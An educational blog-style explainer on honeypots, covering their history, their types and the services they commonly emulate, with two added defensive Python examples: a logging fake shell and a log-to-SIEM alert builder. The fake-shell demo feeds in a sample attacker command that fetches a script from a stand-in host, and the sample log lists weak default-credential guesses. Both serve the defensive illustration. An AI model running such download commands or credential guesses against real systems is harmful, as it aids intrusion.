What is a Honeypot?
A honeypot is typically something (or someone) that is designed to lure a target and extract information. For this project, my targets are threat actors (cyber attackers), and I'm extracting their tactics, techniques, and procedures (TTPs).
Honeypots -- or honey traps -- are steeped in history. They are a popular espionage technique: enemy targets were lured into giving up information and secrets (think James Bond style). The trap-setters gained powerful intelligence, which they leveraged to combat their enemies.
In computer security, a honeypot is a device that's designed to look like a real system (e.g. a computer, server, network, etc) -- but is actually rigged. Threat actors are lured into attacking the honeypot, often believing they have compromised the system. In reality, the security community gains valuable insights into attacker techniques and behaviours. This knowledge -- or threat intelligence -- is used to strengthen the security of computer systems and networks.
A brief history of computing honeypots
In 1986, Clifford Stoll worked as a systems administrator at the Lawrence Berkeley National Laboratory (LBNL). Stoll was trying to resolve a 75-cents accounting error in the computer usage accounts. He traced the error to an unauthorised user that used 9 seconds of computing time without paying for it.
Determined to catch the unauthorised user, Stoll set up an elaborate system of terminals and teleprinters -- a target the user couldn't resist breaking into. Stoll's investigation ultimately became the first documented modern-day case of catching a threat actor with a honeypot. The threat actor turned out to be a tenacious KGB recruit called Markus Hess.
Stoll is a prolific note-taker, and recorded intricate details of his honeypot threat-hunting investigation. This led Stoll to write a fascinating paper, Stalking the Wily Hacker, published in 1988, and a book, The Cuckoo's Egg: Tracking a Spy Through the Maze of Computer Espionage, published in 1989. They're engaging and captivating reads (if you'll pardon the pun) about honeypots -- even for readers who are less interested in the technical aspects.
In 1991, Bill Cheswick and his colleagues at AT&T deployed a series of baits and traps to detect a persistent threat actor that showed a keen interest in military targets. Cheswick later published a paper detailing their honeypot's observations, titled An Evening with Berferd: In Which a Cracker is Lured, Endured, and Studied.
Types of honeypots
Honeypots come in many different types and styles: from physical to software, and from low-interaction to high-interaction. Some honeypots emulate a specific service (e.g. SSH), while others mimic an entire operating system (e.g. Windows).
In terms of capabilities, there are typically 3 types of honeypots: low-interaction, high-interaction, and pure honeypots.
When it comes to deployment purpose, there are typically 2 types of honeypots: production honeypots and research honeypots.
Honeypots that imitate one specific system (such as SSH), and offer limited capabilities, are called low-interaction honeypots. They're ideal for simulating common attack vectors that are frequently requested.
What do we mean by "limited capabilities"?
Well, take SSH (Secure SHell), for example. It's a secure communications protocol used to interact with an operating system. So, an SSH server will typically offer a wide range of services and commands. That's a lot of functionality needed for a convincing honeypot. So, low-interaction honeypots are often designed to emulate commonly used commands, such as:
- ls (list directory contents),
- pwd (print working directory), etc.
The advantages of low-interaction honeypots are that they're usually easier to manage and deploy. They're also less risky because there are fewer things to go wrong (such as the honeypot system itself being compromised).
Low-interaction honeypots are great for catching brute-force attacks that often originate from botnets. Low-interaction honeypots are also good for catching malware that botnets deploy to exploit systems.
However, the disadvantages of low-interaction honeypots are that attackers are more likely to detect them. This is because it's unusual for a live system to have such limited functionality -- a red flag for attackers.
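To make "limited capabilities" concrete, here is an added example (not code from the original post) of the kind of fake shell a low-interaction SSH honeypot presents once a client is past the login banner: a handful of commands are answered from a constructed fake filesystem, every line received is recorded as evidence of the attacker's TTPs, and anything outside that small command set comes back as "command not found". That last behaviour is exactly the limited functionality that can give such a honeypot away. The session id, source address and filesystem contents are constructed placeholders.

```python
"""Added example: a tiny low-interaction "shell" of the kind an SSH honeypot emulates.
Not code from the original post; the fake filesystem and command set are constructed."""
import json
import posixpath
import shlex

# Constructed fake filesystem: directory path -> entries the emulator reports.
FAKE_FS = {
    "/": ["bin", "etc", "home", "root", "tmp", "var"],
    "/root": [".bashrc", ".profile"],
    "/home": ["ubuntu"],
    "/home/ubuntu": [],
    "/tmp": [],
}


class FakeShell:
    """Answers a handful of common commands and records every line received.

    Anything outside the small command set gets 'command not found', which is
    the limited functionality that can give a low-interaction honeypot away."""

    def __init__(self, session_id, src_ip):
        self.session_id = session_id
        self.src_ip = src_ip
        self.cwd = "/root"
        self.events = []  # one record per command line: the raw TTP evidence

    def run(self, line):
        """Handle one command line and return the text the client would see."""
        try:
            argv = shlex.split(line)
        except ValueError:  # unbalanced quotes: fall back to a naive split
            argv = line.split()
        if not argv:
            return ""
        cmd, args = argv[0], argv[1:]
        handler = getattr(self, "cmd_" + cmd, None)
        handled = handler is not None
        self.events.append({"session": self.session_id, "src": self.src_ip,
                            "input": line, "handled": handled})
        if not handled:
            return f"-bash: {cmd}: command not found"
        return handler(args)

    def _resolve(self, path):
        """Turn a relative or absolute path into a normalised absolute path."""
        if not path.startswith("/"):
            path = posixpath.join(self.cwd, path)
        return posixpath.normpath(path)

    def cmd_pwd(self, args):
        return self.cwd

    def cmd_whoami(self, args):
        return "root"  # every visitor is told they are root

    def cmd_echo(self, args):
        return " ".join(args)

    def cmd_ls(self, args):
        flags = [a for a in args if a.startswith("-")]
        paths = [a for a in args if not a.startswith("-")]
        show_all = any("a" in f[1:] for f in flags)  # honour ls -a
        target = self._resolve(paths[0]) if paths else self.cwd
        if target not in FAKE_FS:
            return f"ls: cannot access '{paths[0]}': No such file or directory"
        entries = [e for e in FAKE_FS[target] if show_all or not e.startswith(".")]
        return "  ".join(entries)

    def cmd_cd(self, args):
        target = self._resolve(args[0]) if args else "/root"
        if target not in FAKE_FS:
            return f"-bash: cd: {args[0]}: No such file or directory"
        self.cwd = target
        return ""

    def export_events(self):
        """Serialise the captured commands as JSON lines for a log pipeline."""
        return "\n".join(json.dumps(e) for e in self.events)


if __name__ == "__main__":
    shell = FakeShell("demo-session", "203.0.113.7")  # constructed values
    for line in ["pwd", "ls -a", "cd /tmp", "wget http://example.invalid/x.sh"]:
        print(f"$ {line}")
        print(shell.run(line))
    print(shell.export_events())
```

A real deployment would sit this behind an SSH server implementation and ship `export_events()` output to a collector; the design point is that the emulator never executes anything, it only pattern-matches a small vocabulary and records what was asked.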
Honeypots that emulate a range of systems, and sometimes offer near-full capabilities, are called high-interaction honeypots.
By "near-full capabilities" we mean that the range of emulated systems is almost that of a fully-fledged operating system.
Because high-interaction honeypots have a greater range of services available, attackers may try to perform more complex manoeuvres. This might result in an attacker gaining root access to a system -- valuable threat intelligence.
The advantages of high-interaction honeypots are that they can appear more convincing to attackers and, due to their range of services, produce richer information.
The disadvantages of high-interaction honeypots are that they're harder and more complex to maintain and deploy. High-interaction honeypots also come with increased risks, since there are more things to go wrong, and, potentially, more aspects that could genuinely become compromised.
Honeypots that are a fully-fledged production system are called pure honeypots.
Pure honeypots are often a standard operating system (such as Windows, Ubuntu, or macOS) running in a controlled environment (such as a virtual machine). Typically, pure honeypots are very carefully monitored to ensure they don't become genuine targets.
Pure honeypots are the most complex and difficult to maintain -- and they come with high risks. However, they appear the most convincing to attackers, since the attacker is actually inside a genuine system.
Honeypots deployed with the goal of hardening an organisation's core environment are called production honeypots.
Production honeypots usually have a number of key purposes. They can lure attacks away from production systems -- acting as a distraction that appears to offer more valuable content. They can also provide valuable information for intrusion detection systems (IDS) and security information and event management (SIEM) technology.
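The feed into an IDS or SIEM is simpler than it sounds, because no legitimate user ever has a reason to touch a honeypot: every source that shows up is worth an alert, and the honeypot's own log tells you how serious. The following added example (not the post's code) parses a constructed SSH-honeypot log, tags the brute-force bursts that botnets generate (the low-interaction use case above) and rates any successful login or executed command as high severity, then serialises the alerts as JSON lines for ingestion. The log format, documentation-range addresses, window and threshold are all assumptions.

```python
"""Added example: turning honeypot log lines into alerts for an IDS/SIEM.
Not code from the original post; log format, thresholds and addresses are constructed."""
import json
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample log from a fictional SSH honeypot (documentation-range
# addresses). One malformed line is included to exercise the parser.
SAMPLE_LOG = """\
2024-05-01T10:00:01Z login-failed src=198.51.100.23 user=root pass=123456
2024-05-01T10:00:05Z login-failed src=198.51.100.23 user=root pass=password
2024-05-01T10:00:09Z login-failed src=198.51.100.23 user=admin pass=admin
2024-05-01T10:00:13Z login-failed src=198.51.100.23 user=root pass=toor
2024-05-01T10:00:17Z login-failed src=198.51.100.23 user=root pass=qwerty
2024-05-01T10:00:21Z login-failed src=198.51.100.23 user=pi pass=raspberry
2024-05-01T10:02:00Z login-failed src=203.0.113.7 user=root pass=root
2024-05-01T10:02:10Z login-failed src=203.0.113.7 user=root pass=changeme
2024-05-01T10:02:20Z login-success src=203.0.113.7 user=root pass=changeme
2024-05-01T10:02:25Z command src=203.0.113.7 cmd=uname -a
this line is not in the expected format
2024-05-01T10:05:00Z login-failed src=192.0.2.9 user=ubuntu pass=ubuntu
"""

LINE_RE = re.compile(
    r"^(?P<ts>\S+) (?P<event>\S+) src=(?P<src>\S+)"
    r"(?: user=(?P<user>\S+))?(?: pass=(?P<pw>\S+))?(?: cmd=(?P<cmd>.*))?$"
)


def parse(log):
    """Parse log lines into dicts; lines that do not match the format are skipped."""
    events = []
    for line in log.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        rec = m.groupdict()
        rec["ts"] = datetime.strptime(rec["ts"], "%Y-%m-%dT%H:%M:%SZ")
        events.append(rec)
    return events


def _has_burst(times, window, threshold):
    """True if at least `threshold` sorted timestamps fall inside one `window`."""
    lo = 0
    for hi, t in enumerate(times):
        while t - times[lo] > window:
            lo += 1
        if hi - lo + 1 >= threshold:
            return True
    return False


def build_alerts(events, window=timedelta(minutes=1), threshold=5):
    """One alert per source address. Every source gets at least a low-severity
    alert (nothing legitimate touches a honeypot); a burst of failed logins is
    tagged brute-force; a successful login or an executed command rates high."""
    by_src = defaultdict(list)
    for e in events:
        by_src[e["src"]].append(e)
    alerts = []
    for src, evs in sorted(by_src.items()):
        evs.sort(key=lambda e: e["ts"])
        tags = set()
        fails = [e["ts"] for e in evs if e["event"] == "login-failed"]
        if _has_burst(fails, window, threshold):
            tags.add("brute-force")
        if any(e["event"] == "login-success" for e in evs):
            tags.add("login-success")
        commands = [e["cmd"] for e in evs if e["event"] == "command"]
        if commands:
            tags.add("command-executed")
        if tags & {"login-success", "command-executed"}:
            severity = "high"
        elif "brute-force" in tags:
            severity = "medium"
        else:
            severity = "low"
        alerts.append({
            "src": src, "severity": severity, "tags": sorted(tags),
            "events": len(evs), "commands": commands,
            "usernames": sorted({e["user"] for e in evs if e["user"]}),
            "first_seen": evs[0]["ts"].isoformat(),
            "last_seen": evs[-1]["ts"].isoformat(),
        })
    return alerts


def to_siem_lines(alerts):
    """Serialise alerts as JSON lines, a form most SIEM collectors ingest directly."""
    return "\n".join(json.dumps(a) for a in alerts)


if __name__ == "__main__":
    print(to_siem_lines(build_alerts(parse(SAMPLE_LOG))))
```

The usernames and commands carried in each alert are what make the production honeypot useful beyond the alert itself: the same credentials and commands seen here are what to hunt for in the real estate's authentication logs.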
Honeypots deployed with the goal of gathering, and sometimes discovering, intelligence about threat actors (such as their TTPs) are called research honeypots.
Research honeypots can be pure, high-interaction, or low-interaction, depending on the research questions and aims. Research honeypots may run for long periods of time during longitudinal measurement studies. Research honeypots may also analyse specific threats or observe threat actor methodology and trends.
Research honeypots are popular with threat hunters -- tasked with identifying and reporting empirical threat intelligence to strengthen security. The exploitation attempts a research honeypot absorbs on the defenders' behalf give them the upper hand against threat actors.
There are many services that can be imitated by honeypots. These include databases, SSH, and the web, described below.
I've also curated a list of awesome honeypots.
Popular databases -- such as MySQL, PostgreSQL, MongoDB, Redis, etc -- are common targets for threat actors. So, honeypots that emulate data storage services are a great way to analyse potential vulnerabilities and exploits.
First developed in 1991, SSH (or Secure SHell) is a widely-used cryptographic network protocol for communicating with remote systems. Due to its popularity, and access to the entire system, SSH is a high-value target for threat actors.
Since Tim Berners-Lee's original concept for the World Wide Web in 1989 (see his memorandum, titled Information Management: A Proposal, for a system called "Mesh"), the web has become ubiquitous in our lives. The web's popularity means it's also a key attack vector for threat actors. From vulnerable WordPress plug-ins to brute-forcing of weak authentication -- the web is crawling with attackers. So, web honeypots can help us understand where the weak spots are, and how to improve security.
For further reading on honeypots see:
- Definition: honeypot (computing) from TechTarget
- Honeypot from Wikipedia
- the resources section of this website.
Image credit: "Honey jar" by Nic McPhee, flickr.com/photos/nicmcphee/411317929